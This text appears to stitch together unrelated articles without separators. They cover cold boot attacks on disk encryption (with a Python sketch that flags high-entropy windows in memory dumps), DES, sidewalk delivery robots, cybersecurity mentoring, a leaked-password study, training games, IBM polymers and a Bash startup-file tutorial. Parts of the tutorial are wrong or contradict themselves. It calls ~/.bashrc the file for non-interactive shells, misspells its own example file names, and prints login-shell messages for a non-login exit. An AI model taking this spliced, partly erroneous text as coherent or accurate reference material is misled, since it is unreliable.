A recent study, conducted by Princeton University and the Electronic Frontier Foundation, revealed how successful cold boot attacks can be launched against disk encryption. According to the study, most users assume that dynamic random access memory (DRAM) is erased the moment a computer is shut down. Not so: the data remains readable for several minutes, and this gap gives attackers a window in which to recover DRAM contents.

After much experimentation, the researchers found a number of methods that could be used to penetrate three widely used disk encryption systems. The full research paper includes a detailed analysis of the exact methods used for extracting information, and a short video segment provides a brief overview of the study as well as a demonstration of how the methods can be used. Ed Felten, one of the eight researchers, also followed up with a blog post in which he discusses the experiments, answers questions from readers, and offers advice to those concerned by the study's findings.
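The researchers' tools locate cryptographic keys by scanning captured memory images. The sketch below is a simplified, hypothetical illustration of that idea in Python: it flags high-entropy 16-byte windows in a raw dump as possible key material. The real tools go further and verify candidate AES key schedules; the file name and threshold here are made up.

import math
from collections import Counter

def entropy(window: bytes) -> float:
    # Shannon entropy of the byte distribution in this window.
    counts = Counter(window)
    n = len(window)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def candidate_keys(image: bytes, size: int = 16, threshold: float = 3.8):
    # Near-random windows are candidates for 128-bit key material.
    for offset in range(len(image) - size + 1):
        window = image[offset:offset + size]
        if entropy(window) >= threshold:
            yield offset, window

# Hypothetical usage:
# with open("memory.dump", "rb") as f:
#     for offset, window in candidate_keys(f.read()):
#         print(hex(offset), window.hex())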
3.2.1 What is DES?

DES, an acronym for the Data Encryption Standard, is the name of the Federal Information Processing Standard (FIPS) 46-3, which describes the data encryption algorithm (DEA). The DEA is also defined in the ANSI standard X3.92. It is an improvement on Lucifer, an algorithm developed by IBM in the early 1970s. While the algorithm was essentially designed by IBM, the NSA (see Question 6.2.2) and NBS (now NIST; see Question 6.2.1) played a substantial role in the final stages of its development. The DEA, often called DES, has been extensively studied since its publication and is the best known and most widely used symmetric algorithm in the world.

The DEA has a 64-bit block size (see Question 2.1.4) and uses a 56-bit key during execution (8 parity bits are stripped off from the full 64-bit key). The DEA is a symmetric cryptosystem, specifically a 16-round Feistel cipher (see Question 2.1.4), and was originally designed for implementation in hardware. When used for communication, both sender and receiver must know the same secret key, which can be used to encrypt and decrypt the message, or to generate and verify a message authentication code (MAC). The DEA can also be used for single-user encryption, such as to store files on a hard disk in encrypted form. In a multi-user environment, secure key distribution may be difficult; public-key cryptography provides an ideal solution to this problem (see Question 2.1.3).

NIST (see Question 6.2.1) has re-certified DES (FIPS 46-1, 46-2, 46-3) every five years. FIPS 46-3 reaffirms DES usage as of October 1999, but single DES is permitted only for legacy systems. FIPS 46-3 includes a definition of triple-DES (TDEA, corresponding to X9.52); TDEA is "the FIPS approved symmetric algorithm of choice." Within a few years, DES and triple-DES will be replaced with the Advanced Encryption Standard (AES, see Section 3.3).
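To make the parameters above concrete, here is a minimal sketch of DES encryption using Python's PyCryptodome library (one plausible choice; the key and message bytes are made up). Note the 8-byte key, of which only 56 bits are used, and the 8-byte block:

from Crypto.Cipher import DES

key = b"8bytekey"        # 64 bits supplied; 8 parity bits leave a 56-bit key
plaintext = b"8bytemsg"  # DES operates on 64-bit (8-byte) blocks

cipher = DES.new(key, DES.MODE_ECB)
ciphertext = cipher.encrypt(plaintext)

# The same secret key decrypts -- DES is a symmetric cryptosystem.
assert DES.new(key, DES.MODE_ECB).decrypt(ciphertext) == plaintext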
Imagine a six-wheeled robot about the size of a suitcase rolling down a bustling city sidewalk and delivering packages to local businesses, the elderly, and young professionals short on time. Suddenly, a boy jumps in its path, and the robot veers, missing him by inches. This is not a sci-fi movie scene, but rather a likely street view in the not-too-distant future. Robots are marching toward everyday life, hoping to blend into the hustle and bustle of society. But are we really safe with them around?

"It is important in terms of social acceptance as well as safety that people are able to predict a robot's behavior," says Matthew Walter, an assistant professor at Toyota Technological Institute in Chicago.

Robots are already appearing on sidewalks in select cities. Estonia-based tech startup Starship Technologies tested its delivery robot just four weeks ago in San Francisco. The turnover of professional service robots, such as those in healthcare and logistics, will grow to $23.1 billion for the period 2016-2019, compared to $4.6 billion in 2015, according to the latest report by the International Federation of Robotics.

The unpredictable nature of sidewalks presents an especially difficult challenge for robots, from inattentive adults staring into phones to absent-minded children playing imaginary games to harried professionals rushing out of buildings. Then there are critical moments of interaction with car drivers and bicyclists. "I think probably one of the biggest challenges is dealing with pedestrians, navigating around pedestrians, and predicting their behavior," Walter says.

All of which raises the question: How quickly can robots respond to encounters with humans? Starship's robot travels at pedestrian speed – about four miles per hour – and uses computer vision, along with GPS and proprietary mapping, to pinpoint its location to the nearest inch. It has a sophisticated obstacle avoidance system that acts as a "bubble of awareness" around the robot, preventing it from bumping into things, says Henry Harris-Burland, marketing and communications manager at Starship. "Let's say the system fails," he says. "The worst thing that can happen is the robot just comes to a slow stop. It stops in 30 centimeters, which is a very safe stop distance."

Perhaps more challenging, humans need to learn how to interact with a robot, too. A pedestrian, for instance, crosses the road safely after making eye contact with a car driver because both sides have an established social contract that the pedestrian goes first. Such unspoken social contracts would be difficult to achieve with robots.

That's not to say delivery robots are too dangerous for their own good. They offer an incredibly valuable service, such as delivering food to the elderly who have a tough time venturing out in bad weather (although snow-covered stop signs and traffic lights might confuse robots). Most signs point to a future with robots, which isn't a bad thing as long as people don't get hurt in the name of progress, says at least one casual observer. "I think it would be a very efficient way to get things quickly," says Samir Patel, a law school undergraduate at Washington University in St. Louis. "Automated things are always a little bit better, but the only concern I might have is people's safety on the sidewalks."
“Learning is not the product of teaching. Learning is the product of the activity of learners.” – John Holt

My last blog, A call to action: Promoting computer science in schools, challenged cybersecurity professionals to work with their local school districts to help improve computing education. It's a start. Education is more than just classrooms and teachers. It's active learners working to improve their knowledge, skills, and abilities. It's mentors guiding both students and teachers. It's making learning fun. All of these reinforce education.

Call to Action – Part 2: We need cybersecurity professionals to mentor young minds entering our profession. Why you need to get involved:

- The students, teachers, and parents need you (see my previous blogs).
- You can get Continuing Professional Education (CPE) credits for volunteer work. ISC2, ISACA, and many other cybersecurity certifying bodies recognize mentoring as a way of enhancing your own education.
- You will make a difference in a young person's life. Kids need mentors to guide and direct them. There's something powerful about directly impacting someone as a mentor.

See the information below on how you can get involved in your local community. Competitions, clubs, and conferences allow students to go beyond the classroom to learn cybersecurity and develop professional traits. There are multiple competitions at the local and national levels promoting learning. Each has the goal of encouraging professional development and cybersecurity education outside of the traditional classroom.

CyberPatriot is the National Youth Cyber Education Program. In its eighth year, CyberPatriot was conceived by the Air Force Association (AFA) to inspire high school students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM) disciplines critical to our nation's future. Evan Dygert, the 2014-2015 US CyberPatriot Mentor of the Year, shows the value of the program for both the students and the mentors: "It's just fun. Watching the students learn about something that will have an impact on their careers, since most are interested in going into the cybersecurity career field. Don't underestimate the impact you can have on these kids. Students are qualified to work in the field, but just need the direction." [Full disclosure: I'm the 2013-2014 CyberPatriot Mentor of the Year.]

The 2015-2016 competition season is just getting started. To learn more, watch the YouTube videos Looking for an action-packed STEM activity? Check out CyberPatriot today! and CyberPatriot and CYBER++, Aspiring Students to Learn, and see the CyberPatriot website and volunteer page. There are teams throughout the US needing mentors.

MITRE / ISC2 CTF

MITRE Cyber Academy promotes the growth of cybersecurity skills. Using the motto of "Learn, Practice, Compete," it provides a portal for high school and undergraduate college students and teachers to use publicly available training resources to grow fundamental abilities in essential cybersecurity topics. The MITRE / ISC2 Capture the Flag (CTF) competition is an annual challenge for students to practice their hacking skills in multiple, interactive, online challenges. In its fifth year, this challenge has teams throughout the US and is looking to have over 100 competitors this year. If you're interested in participating in the 2015 CTF competition, you need to act fast: it will be held September 11-12, 2015. Even if you don't make the competition, the free training resources and past competitions are available.

The National Collegiate Cyber Defense Competition (NCCDC) provides college students the ability "to apply the theory and practical skills they have learned in their course work in a competitive environment." A benefit of this and the other competitions is the fostering of teamwork, ethical behavior, technical skills, and communications.

The Cybersecurity Competition Federation (http://cyberfed.org/) "is an association of academic, industry and government organizations with a common interest in supporting cybersecurity competitions and the competitors they serve." Dr. Dan Manson, a Professor and Department Chair in Computer Information Systems at California State Polytechnic University, Pomona, directs this initiative. He sees cybersecurity competitions as "a learning sport providing real world challenges leading directly into employment." He echoes the value of taking learning outside of the traditional classroom: "Something magical happens in these competitions. The students spend more time preparing than any class they may take. It's also a true co-ed team competition sport where diversity and differences are a strength."

I challenge you to get involved in these activities. EACH NEEDS YOU TO MAKE IT EFFECTIVE. Educate yourself on these opportunities. Check out the websites and reach out with your questions. Sign up and be an active part of your community. You will be richly rewarded when you do, knowing you're not only helping your own career but, more importantly, making a difference in a young person's life.

Next time I'll discuss more positive learning opportunities found in kid-centered conferences. I look forward to your comments, ideas, and questions.
According to a 2014 Gallup survey, Americans fear being hacked more than they fear any other crime. We're worried about our credit card information, our medical records, our email, and our personal information – and with good reason. In 2014, more than one billion personal records were illegally accessed. In 2016, Yahoo disclosed that hackers stole personal information from more than 500 million accounts.

So the question is: How vulnerable are you? Are your passwords secure? Is your personal information under wraps? To gain some insight, we examined 50,000 emails and passwords that were leaked online. We analyzed passwords for root words and easy-to-guess elements. Here's what we learned.

The 30 Most Common Passwords

In the 50,000 passwords we analyzed, the most commonly used words were love, star, girl, angel, rock, miss, hell, Mike, and John. Because one of the ways hackers steal passwords is by guessing commonly used words, we recommend steering clear of these popular terms – or, even better, using nonsense words and letter-number combinations. So, who's vulnerable to these hacks?

Using Names in Your Passwords Is a No-No

Perhaps unsurprisingly, the most common names of those hacked are also ... well, some of the most common names in America – with Mike/Michael, Chris/Christopher, John/Jonathan, and Dave/David leading the pack. Men were slightly more prone to being hacked, based on our info. And interestingly, those aged 25 to 34 were four times more likely to be hacked than any other demographic. They also happen to be the men most likely to be named Mike, Chris, John, or Dave. According to Business Insider, millennials grew up with a third parent: the Internet. But perhaps they weren't spoon-fed online security tips from an early age. And, interestingly, some states are more secure than others.

Are Some States More Secure Than Others?

According to the data, the answer is yes. Hawaii was home to the most leaked passwords, with an average of 28.71 leaks per 100,000 residents. That's more than six times the national average (4.67) and a 58 percent increase over the next riskiest state (California, at 18.18). Of course, Hawaii isn't the only state with a higher-than-average risk. Based on our analysis, 15 states carry that distinction. Hawaii tops the list, but California and Nevada are more than double the national average, and Washington and New York aren't far behind.

Password Faux Pas: Who's Using Their Own Names?

If using personal data in a password is a big no-no, using your own name is an even worse mistake. Granted, there are still worse passwords out there. Some people still think 1234567890 is a good choice. If it's not good enough for your luggage, why would it be good enough for your bank account? Although many users know that name-password combinations are insecure, more than 42 percent of those 50,000 leaked passwords still included the user's username or real name. The worst offenders? People named Amy, Lisa, Scott, Mark, or Laura. Of course, while Amys and Lisas may be the worst offenders in the name-in-my-password bunch, overall, men are actually more likely than women to fall into this trap – 20 of the top 25 biggest offenders on the list were typically male names. Perhaps unsurprisingly, the most common names of those hacked are also more common names in general: John, Michael, and Joseph are among the most common first names in the country.

Is Your Email Provider Secure?

When it comes to leaked passwords, which email providers have had the most breaches? Based on our data, the answer is Yahoo, by a large margin. (Yahoo had almost three times as many hacked emails as any other email provider on our list.) The next most commonly hacked email provider was Hotmail, followed by Gmail. The least hacked email provider was internet veteran AOL, despite the fact that AOL users were actually the most likely of any users on our list to use passwords containing part of their name.

Keeping Your Emails and Data Safe

The truth is that hacking techniques are more sophisticated than ever before. According to cybersecurity expert Misha Glenny, there aren't any companies that haven't been hacked – there are just companies that know about the hacks and companies that don't. So what can you do? First, you can learn from the mistakes in the data we examined. Don't use your name, your pet's name, or your best friend's name in your password. Don't use common words. Instead, come up with random, difficult-to-guess combinations of letters, numbers, and characters. Or, even better, use a trusted password service like LastPass. Change your passwords often, pay attention when a service you use is hacked (when the press reports a Yahoo hack, it's time to change your password), and educate yourself about the latest security options. And of course, you can always take a training course on security to better understand how to protect yourself.

For this blog post, we searched the web for leaked emails and passwords to find out more about the demographics of people who have had their information revealed on the internet. We analyzed about 50,000 emails using the fullcontact.com API, which gave us information on users' genders, ages, names, and locations. We then analyzed passwords using a dictionary list to determine which root words were most common among these passwords. In addition, we cross-referenced user passwords – matching username, first name, or last name – to determine whether some form of "common knowledge" was used within a user's password.
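That cross-referencing step amounts to a simple substring check. Here is a minimal sketch in Python; the function and field names are illustrative, not the actual analysis code:

def uses_personal_info(password, username, first_name, last_name):
    # Flag a password that contains the account's username or real name.
    pw = password.lower()
    parts = (username, first_name, last_name)
    return any(part and part.lower() in pw for part in parts)

# Example: a password built around the user's own first name.
print(uses_personal_info("amy1987!", "asmith", "Amy", "Smith"))  # True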
The Importance of Games in Learning

More than any other, the “millennial” generation that is coming into the workforce has been raised on games. From “Grand Theft Auto” to “Mario Kart”, from “World of Warcraft” to “Gears of War,” members of this cohort eat, sleep, live and breathe games of all kinds. Gen Xers can game with the best of them too, having grown up on classics such as “Pac-Man,” “Q*Bert” and “Asteroids.” And a few baby boomers also have caught on to video games, although generally not to the extent that the successive generations have.

Gaming truly has become an industry — and not just in terms of video games. Indeed, billions of dollars in profits have been generated through games of chance found in casinos all over the country. In particular, Texas Hold ’Em poker has caught on not only as a popular card game but also as a spectator sport of sorts.

With games associated so closely with leisure, it’s not hard to understand why people who run training programs might not immediately consider them as a tool for study. After all, games are just diversionary and can’t convey much in the way of meaningful knowledge, right?

Not so. While no educational strategy should rest entirely on games, these platforms can bring a lot to the training table. For one thing, they’re an engaging and fun way to transmit information. What’s more, younger professionals are beginning to expect and even demand these kinds of training experiences. Because of their backgrounds, they respond well to these offerings, and vendors would do well to consider adding training games to their suite of products, if they haven’t already.

The market for training games is still somewhat sparse, so don’t expect to find a whole lot out there right now. There are a few reasons for this. The first — the mindset of “Games are for fun, not for learning” — was alluded to earlier. But even if games were universally accepted as a training tool, it wouldn’t necessarily lead to many more of them. They’re not easy to develop, especially video games, which involve substantial time, money and effort. And for training providers, keeping up with the rapidly changing world of certification is key.

A notable exception is Cisco Systems, which has rolled out a series of learning games designed to help IT pros learn fundamental IT skills and concepts such as binary language and routing and switching terminology. While these don’t always align directly to the company’s certification programs, they are a useful tool for introducing novices to new areas of technology that Cisco’s credentials cover. As design tools such as Flash become more robust and easy to use, you might see a greater proliferation of these learning games.

If you’re looking to get into gaming for the purposes of training, though, you don’t have to wait for vendors to roll out these programs — on your own, you can come up with games that help you learn the subjects a certification covers. Should you opt to do it yourself, there are a couple of suggestions for creating a good training game. First, make it multiplayer. Involve colleagues who are on a similar career path and are pursuing the same certification or at least an analogous one. The competition will make it fun and help get everyone involved to participate fully. Also, feel free to mine the gaming landscape for ideas. You easily could take the format and rules from games such as Trivial Pursuit, Jeopardy, Taboo and even Pictionary and incorporate technical terms and concepts into those.
IBM scientists have invented a new class of experimental polymers that are exceptionally lightweight, remarkably strong, and even self-healing, which they say could transform manufacturing and fabrication in the transportation, aerospace, and microelectronics industries. IBM's research division published its findings on the novel polymers in the journal Science on Thursday with collaborators UC Berkeley, Eindhoven University of Technology and King Abdulaziz City for Science and Technology (KACST), Saudi Arabia. The discovery was based upon a 'computational chemistry' hybrid approach that combines lab experimentation and synthetic polymer chemistry with advanced supercomputing. IBM reports that the new materials are the first to demonstrate resistance to cracking and strength higher than bone while also being self-healing and completely recyclable.

Polymers – long chains of molecules that are connected through chemical bonds – are everywhere. From clothing to drink bottles, paints, food packaging and many building materials, polymers are a critical component in most modern technologies. Yet as crucial as these substances are, today's polymers are lacking in some key ways. Such shortcomings include poor crack resistance, insufficient thermal resistance, and lack of recyclability. By addressing these limitations, IBM's new polymer class could be poised for transformative uses in a wide array of fields.

The polymers are also tunable, which means that specific attributes can be emphasized by how much heat is used in the curing process and through the addition of filler materials. Using high heat in tandem with reinforcing fillers, IBM researchers were able to create super-strong polymers that they nicknamed "Titan." Such materials behave a lot like metal but are more lightweight, making them good candidates for use in airplanes and cars. Another process uses low-heat curing to form elastic gels that are strong yet flexible like a rubber band. Called "Hydro" by IBM insiders, this type of polymer is self-healing as a result of the hydrogen-bonding interactions in the hemiaminal polymer network. "Probably the most unexpected and remarkable characteristic of these gels," states IBM, "is that if they are severed and the pieces are placed back in proximity so they physically touch, the chemical bonds are reformed between the pieces making it a single unit again within seconds." Potential applications would be ones that require reversible assemblies, such as drug cargo delivery. The ability to selectively recycle a component would also be a boon to the semiconductor industry, where defective parts could be reused as a base material, helping to conserve expensive resources.

According to reporting from The New York Times, this discovery was several decades in the making; the IBM scientists say it has been that long since a distinctly new polymer class was invented. And apparently, it all started with an error. IBM laboratory research chemist Jeannette M. Garcia was cooking up a recipe for a recyclable plastic and inadvertently omitted one of the steps. She later returned to find a hard white plastic that was impervious to grinding and hammering.

Using computer modeling on powerful supercomputers, the researchers discovered a new polymer family with two primary types, one "soft and gooey" and the other very rigid, dubbed "Hydro" and "Titan."

"New materials innovation is critical to addressing major global challenges, developing new products and emerging disruptive technologies," said James Hedrick, Advanced Organic Materials Scientist, IBM Research. "We're now able to predict how molecules will respond to chemical reactions and build new polymer structures with significant guidance from computation that facilitates accelerated materials discovery. This is unique to IBM and allows us to address the complex needs of advanced materials for applications in transportation, microelectronic or advanced manufacturing."
If you work with a tool long enough, you master its purpose. Moreover, the tool becomes an extension of yourself. Think of Gustav Klimt's brush, Louis Armstrong's trumpet, and Mark Twain's turn of phrase. If you're a virtuoso, your "tools of the trade" effortlessly channel your intent, spirit, and expression to your medium.

By now, I hope your skills have reached those of a UNIX® acolyte. You practice your command-line katas. You consult the omniscient oracle of man when you crave knowledge. And you craft command combinations that perform sheer alchemy on data. You're at ease at the command line, and the shell feels comfortable and familiar. The next stage in your apprenticeship, Grasshopper, is to make the shell your own.

The great and mighty shell

You've already seen many techniques to customize your shell environment:

- You can choose the UNIX shell you'd like to use. The Bourne shell is a stalwart; others, such as the Z shell, offer novelties and conveniences that you may find helpful. To find the shells available on your UNIX system, use the command cat /etc/shells. To change your shell to any of the shells listed, use the chsh command. Here's an example to change to /bin/zsh, the Z shell. (Type the text shown in bold.)

$ cat /etc/shells
/bin/bash
/bin/csh
/bin/ksh
/bin/sh
/bin/tcsh
/bin/zsh
$ chsh -s /bin/zsh

- You can create short aliases to stand in for lengthy commands.
- Environment variables, such as PATH (which controls where to search for programs) and TZ (which specifies your time zone), persist your preferences and affect all the processes you launch. PATH is especially useful. For example, if you want or need to run a local, enhanced version of Perl, you can alter your PATH to prefer /usr/local/bin/perl instead of the (typical) standard version found in /usr/bin/perl. UNIX applications often use environment variables for customization, too. For instance, if your terminal (or emulator) is capable, you can colorize the output of ls (list directory contents) with the environment variables CLICOLOR and LSCOLORS.
- You can retain and recall command lines through the shell's built-in command history. Command histories conserve typing, allowing you to re-run an earlier command. Many shells also allow on-the-fly modification of a previous command to create a new command. For example, the Bash shell uses the caret (^) character to perform substitutions:

$ ls -l heroes.txt
-rw-r--r-- 1 strike strike 174 Mar 1 11:25 heroes.txt
$ ^heroes^villains
ls -l villians.txt
villians.txt

Here, the quirky command line ^heroes^villains substitutes the word villains for heroes in the immediately previous command (the default, if a numbered command in the history list isn't provided) and runs the result, ls -l villians.txt. Consult your shell's documentation for its syntax for command-line substitutions.
- You can write shell scripts to (re-)perform complex operations if the existing UNIX utilities and your shell's built-in features lack a feature you'd like to use regularly. As you'll see in an upcoming "Speaking UNIX" article, you can also download and build an enormous number of additional UNIX utilities, typically provided as open source. In fact, with Google or Yahoo! and a few minutes of time, you can usually and readily find and download a suitable solution rather than create your own. (Be lazy! Spend your bonus free time watching clouds.)
Of course, with so many options for fine-tuning your shell, it would be nice if you could persist your preferences and re-use those settings time and again, from shell to shell (say, in different X terminal windows), session to session (when you log out and return to log in again), and even across multiple machines (assuming that you use the same shell on multiple platforms). Shell startup scripts provide this endurance. When a shell starts and as it terminates, the shell executes a series of scripts to initialize and reset your environment, respectively. Some startup scripts are system-wide (your systems administrator configures them), and others are yours to customize freely.

Startup scripts aren't like Microsoft® Windows® INI files. As the name implies, startup scripts are true shell scripts—those little programs you write to achieve some work. In this case, the shell scripts run whenever the shell starts or terminates and affect the shell environment.

Start me up!

Typically, each shell provides for several shell startup scripts, and each shell dictates the order in which the scripts run. At a minimum, you can expect a system-wide startup file and a personal (per-user) startup file. Think of the entire shell startup sequence as a kind of cascade: The effects of running (potentially) multiple scripts are cumulative, and you can negate or alter parameters set early in the sequence in a subsequent script. For example, your systems administrator might set a helpful default shell prompt for the entire system—something that includes your user name, current working directory, and command history number, for instance—in the system-wide shell startup file. However, you can override this file by resetting the shell prompt to your liking in your own startup script. Otherwise, if you don't alter a system-wide setting, it persists in your shell and environment.

Typically, the earliest startup scripts are system-wide, such as /etc/profile, and your systems administrator manages them. System-wide startup files aren't intended as an intrusion, but rather facilitate the use of resources specific to that system. For example, if your system administrator prefers that you use a newer version of the Secure Shell (SSH) utility because it addresses a known security flaw, he or she might set each user's initial PATH variable to /usr/local/bin:/bin:/usr/bin, which prioritizes executables found in /usr/local/bin. (If the command isn't found in /usr/local/bin, the shell continues its scan in /bin and then /usr/bin.) System-wide startup files are also used to name printers, display bulletins about planned downtime, and provide new users with reasonable shell defaults. (Don't haze the newbies.)

After the system-wide script (or scripts) runs, the shell runs user-specific startup scripts. The per-user files are the appropriate places to keep your favorite aliases, environment settings, and other preferences.

Planning for the big Bash

The number and names of the shell startup scripts vary from one shell to another. Let's look at the startup sequence of the Bash shell, /bin/bash. The Bash shell is found on all flavors of UNIX and Linux®, and it is typically the default shell of new systems and users. It's also representative of many other shells and thus serves as a good demonstration. (If you use another shell, consult its documentation or man page for the names and processing order of its startup scripts.) Bash searches for six startup scripts, but each of those scripts is optional.
Even if all six scripts exist and are readable, Bash executes only a subset of the six in any situation. Bash first executes /etc/profile, the system-wide startup file, if that file exists and the user can read it. After reading that file, Bash looks for ~/.bash_profile, ~/.bash_login, ~/.profile, and ~/.bashrc—in that order—where ~ is the shell's abbreviation for the user's home directory (also available as $HOME). If you exit Bash, the shell searches for ~/.bash_logout.

Which of the six files executes depends on the "mode" of the new shell. A shell can be a login shell, and it might or might not be interactive. (A login shell is also an interactive shell; however, you can force a non-interactive shell to behave like a login shell. More on that later.) In UNIX days of yore (a scant two decades ago), you typically accessed a UNIX machine through a dumb terminal. You would type your user ID and password at the login prompt, and the system would spawn a new login shell for your session. In this environment, a login shell was differentiated from other shell instances (such as those running a shell script) by name: The process name of each login shell was prefixed with a hyphen, as in -bash. This special name—a longtime UNIX artifact—tells the shell to run any special configuration for login sessions.

An interactive shell is easier to explain: A shell is interactive if it responds to your input (standard input) and displays output (to standard out). Today, the X terminal has replaced the dumb terminal, but the convention and paradigm of shell modes remain. Usually, an X terminal spawns Bash as a login shell, which forces Bash to perform the login startup sequence.

In the case of Bash, an interactive login shell runs /etc/profile, if it exists. (A non-interactive shell also runs /etc/profile if Bash is invoked as bash --login.) Next, the interactive login shell looks for ~/.bash_profile and executes this script if it exists and is readable. Otherwise, the shell continues, trying to execute ~/.bash_login. If the latter file doesn't exist or is unreadable, Bash finally attempts to execute ~/.profile. Bash runs only one personal startup file—the startup sequence stops immediately afterward. When a Bash login shell exits, it executes ~/.bash_logout.

If the Bash shell is interactive but not a login shell, Bash attempts to read ~/.bashrc. No other files are executed. If the Bash shell is non-interactive, it expands the value of the BASH_ENV environment variable and executes the file named there.

Of course, you can provide additional settings by calling your own scripts from within Bash's standard scripts. The special shell abbreviation . (or its synonym source) executes another shell script. For example, if you want to share the settings in ~/.bashrc between interactive login shells and interactive non-login shells, place the command:

. ~/.bashrc

in ~/.bash_profile. When the shell encounters the dot command, it immediately executes the named shell script.

Peering into the shell

The best way to explore the startup sequence is to create some simple shell startup files. For example, if you run the ssh farfaraway ls command, is the remote shell that SSH spawns on the remote system named farfaraway a login shell? An interactive shell? Let's find out. Listings 1, 2, 3, and 4 show sample /etc/profile, ~/.bash_profile, ~/.bashrc, and ~/.bash_logout files, respectively. (If these files already exist, make backups before you continue with this exercise. You need superuser privileges on your machine to change /etc/profile.)
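As an aside, you can ask a running Bash instance which mode it is in before you start experimenting. This small sketch is not part of the original listings; it relies on two standard Bash features, the i flag in $- and the login_shell shell option:

# "i" appears in $- only in interactive shells.
case $- in
  *i*) echo "This shell is interactive" ;;
  *)   echo "This shell is non-interactive" ;;
esac

# Bash turns on the login_shell option for login shells.
if shopt -q login_shell; then
  echo "This shell is a login shell"
else
  echo "This shell is not a login shell"
fi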
Use your favorite text editor to create the files as shown. Listing 1 shows a sample /etc/profile script. This file is the first startup file to run (if it exists and is readable).

Listing 1. Sample /etc/profile file

echo "Executing /etc/profile"
echo '(Interactive, login shell)'
PATH="/bin:/sbin:/usr/bin:/usr/sbin"
export PATH

Listing 1 echoes a message as the script begins and sets a minimal PATH variable. Again, this file runs if the shell is an interactive login shell. For example, launch a new X terminal. You should see something like this:

Last login: Tue Apr 17 21:06:23 on ttyp1
Executing /etc/profile
(Interactive, login shell)
Executing /Users/strike/.bash_profile
(Interactive, login shell)
Including /Users/strike/.aliases
strike @ blackcat 1 $

Good! That's the predicted sequence when launching a new login shell in an X terminal. Notice the shell prompt: It reflects the user name, the short hostname (everything before the first dot), and the command number. If you type logout at the prompt, you should see this:

strike @ blackcat 31 $ logout
Executing /Users/strike/.bash_logout
(Interactive, login shell)

As described, the interactive login shell runs ~/.bash_logout.

Listing 2 shows a sample ~/.bash_profile file. This file is one option for customizing your shell at startup.

Listing 2: Sample ~/.bash_profile file

echo "Executing $HOME/.bash_profile"
echo '(Interactive, login shell)'
PS1='\u @ \h \# \$ '
export PS1
PAGER=/usr/bin/less
export PAGER
. .aliases

Next, let's see what happens when you launch a new shell from the prompt. The new shell is interactive, but it's not a login shell. According to the rules, ~/.bashrc is the only file expected to run.

strike @ blackcat 1 $ bash
Executing /Users/strike/.bashrc
(Interactive shell)
blackcat:~ strike$

And, in fact, ~/.bashrc is the only file to execute. The proof is in the prompt—the prompt at bottom is the default Bash prompt, not the one defined in ~/.bash_profile. To test the logout script, type exit (you cannot type logout in a non-login shell). You should see:

blackcat:~ strike$ exit
exit
Executing $HOME/.bash_logout
(Interactive, login shell)
strike @ blackcat 2 $

As an interactive login shell terminates, it executes ~/.bash_logout. You might use this feature to remove temporary files, copy files as a simple method of backup, or perhaps even launch rsync to distribute any changes made in this most current session.

Listing 3 shows a sample ~/.bashrc file. This file is the initialization file for non-interactive Bash shell instances.

Listing 3: Sample ~/.bashrc file

echo "Executing $HOME/.bashrc"
echo "(Interactive shell)"
PATH="/usr/local/bin:$PATH"
export PATH

Here's another experiment: What kind of shell do you get when you run SSH? Let's try two variations. (You can simply use SSH to get back to your local machine—it works the same as if you were running SSH from a remote machine.) First, use SSH to log in to the remote machine:

strike @ blackcat 1 $ ssh blackcat
Last login: Tue Apr 17 21:17:35 2007
Executing /etc/profile
(Interactive, login shell)
Executing /Users/strike/.bash_profile
(Interactive, login shell)
Including /Users/strike/.aliases
strike @ blackcat 1 $

As you might expect, running SSH to access a remote machine launches a new login shell. Next, what happens when you run a command on the remote machine? Here's the answer:

strike @ blackcat 3 $ ssh blackcat ls
Executing /Users/strike/.bashrc
(Interactive shell)
villians.txt
heroes.txt

Running a command remotely using SSH spawns a non-login interactive shell. Why is it interactive?
Because the standard input and the standard output of the remote command are tied to your keyboard and display, albeit through the magic of SSH.

Listing 4 shows ~/.bash_logout. This file runs as the shell terminates.

Listing 4: Sample ~/.bash_logout file

echo "Executing $HOME/.bash_logout"
echo "(Interactive, login shell)"

Helpful tips for startup files

The more you use the shell, the more you can benefit from persisting your preferences in startup files. Here are some helpful tips and suggestions for organizing your Bash settings. (You can apply similar strategies to other shells.)

- If you have settings (for example, PATH) that you want to use in every shell (regardless of its mode), place those settings in ~/.bashrc and use source to access the file from ~/.bash_profile.
- If you have accounts on multiple machines (and your home directory isn't shared among them through the Network File System [NFS]), use rsync to keep your shell startup files in sync across all machines on the network.
- If you apply certain preferences depending on the host you're using—say, a different PATH if one system has special resources—place those settings in a separate file and use source to access it during shell startup. If you choose to use rsync to manage your files, omit the host-specific file from the file distribution list.

Of course, you can also create a global script and use conditionals and the environment variable HOSTNAME to choose the appropriate settings. (HOSTNAME is set automatically by the shell and captures the fully qualified host name.) For example, here's a useful snippet commonly found in startup files:

case $HOSTNAME in
  lab.area51.org)
    PATH=/opt/rocketscience/bin:$PATH
    PS1='\u @ \h \# \$ '
    export PS1;;
  alien.area51.org)
    PATH=/opt/alien/sw/bin:$PATH;;
  saucer*)
    PATH=/opt/saucer/bin:$PATH
    PAGER=less
    export PAGER;;
  *)
    PATH=/usr/local/bin:$PATH
esac
export PATH

The construct here is a switch statement that compares the value of $HOSTNAME against four possible values: lab.area51.org, alien.area51.org, a pattern (saucer*) that matches any hostname beginning with the literal string saucer (a hostname such as saucer-mars would match; a hostname such as sauce.tomato.org would not), and everything else. Here, in the case of Bash, the asterisk (*) is interpreted as a shell operator, not as a regular expression operator. When a match is made against one of the patterns, the statements associated with that pattern execute. Unlike other switch statements, Bash's case runs one set of statements only.

Finally, look at the shell startup files of other users for inspiration and to save perspiration. (Some users protect these files and their home directory, though, which precludes you from browsing.) Does Joe have a cool, useful prompt? Ask how to implement the same thing. Does Jeanette have extensive keyboard accelerators or a great collection of environment variables to eke out special features from utilities? Chat with her about her recipes. The best source of ideas and code comes from experienced practitioners of the command line.

Customizing your shell

Tweakers and modders, unite! You can customize your shell extensively, and after you find a setting or series of settings you like, save them in a startup file to re-use again and again. Use rsync or a similar tool to propagate your environment from one machine to another. Your lesson is done. Time for more katas.
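As the tips above suggest, propagating your startup files to another machine can be a single command. A minimal sketch, reusing the hostname from the earlier example; the file list is illustrative:

# Copy the local startup files to your home directory on the remote host.
rsync -av ~/.bash_profile ~/.bashrc ~/.aliases farfaraway:~/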
